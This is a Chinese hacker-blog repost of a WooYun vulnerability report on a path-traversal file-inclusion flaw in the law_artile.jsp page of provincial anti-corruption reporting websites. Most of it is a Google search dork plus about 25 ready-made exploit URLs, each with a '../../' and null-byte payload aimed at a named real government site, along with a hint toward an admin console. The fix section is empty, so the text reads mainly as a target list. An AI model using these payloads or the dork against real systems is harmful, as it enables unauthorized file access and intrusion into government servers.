记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

某纪委监察系统通用型文件包含(涉及全国大部分省)

2014-05-27 07:05

Google:site:gov.cn inurl:law_artile.jsp



http://yunnan.12388.gov.cn/jubao/site/law_artile.jsp?id=../../scripts/site.js?%00.jpg 云南省

http://shanxi.12388.gov.cn/jubao/site/law_artile.jsp?id=../../scripts/site.js?%00.jpg 山西省

http://jiangxi.12388.gov.cn/site/law_artile.jsp?id=../../scripts/site.js?%00.jpg 江西省

http://hebei.12388.gov.cn/site/law_artile.jsp?id=../../scripts/site.js?%00.jpg 河北省

http://shanghai.12388.gov.cn/site/law_artile.jsp?id=../../scripts/site.js?%00.jpg 上海市

http://sichuan.12388.gov.cn/jubao/site/law_artile.jsp?id=../../scripts/site.js?%00.jpg 四川省

http://neimeng.12388.gov.cn/jubao/site/law_artile.jsp?id=../../scripts/site.js?%00.jpg 内蒙古

http://www.jubao.gd.gov.cn/site/law_artile.jsp?id=../../scripts/site.js?%00.jpg 广东省

http://henan.12388.gov.cn/site/law_artile.jsp?id=../../scripts/site.js?%00.jpg 河南省

http://anhui.12388.gov.cn/jubao/site/law_artile.jsp?id=../../scripts/site.js?%00.jpg 安徽省

http://heilongjiang.12388.gov.cn/site/law_artile.jsp?id=../../scripts/site.js?%00.jpg 黑龙江

http://tianjin.12388.gov.cn/jubao/site/law_artile.jsp?id=../../scripts/site.js?%00.jpg 天津市

http://hubei.12388.gov.cn/jubao/site/law_artile.jsp?id=../../scripts/site.js?%00.jpg 湖北省

http://fujian.12388.gov.cn/site/law_artile.jsp?id=../../scripts/site.js?%00.jpg 福建省

http://chongqing.12388.gov.cn/jubao/site/law_artile.jsp?id=../../scripts/site.js?%00.jpg 重庆市

http://shanxi.lvliang.12388.gov.cn/site/law_artile.jsp?id=../../scripts/site.js?%00.jpg 山西省吕梁市

http://shanxi.yangquan.12388.gov.cn/site/law_artile.jsp?id=../../scripts/site.js?%00.jpg 山西省阳泉市

http://shanxi.jincheng.12388.gov.cn/site/law_artile.jsp?id=../../scripts/site.js?%00.jpg 山西省晋城市

http://shanxi.datong.12388.gov.cn/site/law_artile.jsp?id=../../scripts/site.js?%00.jpg 山西省大同市

http://shanxi.jinzhong.12388.gov.cn/site/law_artile.jsp?id=../../scripts/site.js?%00.jpg 山西省晋中市

http://guangxi.12388.gov.cn/site/law_artile.jsp?id=../../scripts/site.js?%00.jpg 广西壮族自治区

http://hunan.12388.gov.cn/jubao/site/law_artile.jsp?id=../../scripts/site.js?%00.jpg 湖南省

http://xizang.12388.gov.cn/jubao/site/law_artile.jsp?id=../../scripts/site.js?%00.jpg 西藏自治区

http://haerbin.12388.gov.cn/site/law_artile.jsp?id=../../scripts/site.js?%00.jpg 哈尔滨市

http://xinjiang.12388.gov.cn/site/law_artile.jsp?id=../../scripts/site.js?%00.jpg 新疆省

漏洞证明:

Example:



Admin:http://***.gov.cn/**/console/



http://yunnan.12388.gov.cn/jubao/site/law_artile.jsp?id=../../scripts/site.js?%00.jpg



01.jpg





http://yunnan.12388.gov.cn/jubao/site/law_artile.jsp?id=../../styles/default.css?%00.jpg



02.jpg

修复方案:


知识来源: www.wooyun.org/bugs/wooyun-2014-052012

阅读:235690 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“某纪委监察系统通用型文件包含(涉及全国大部分省)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

ADS

标签云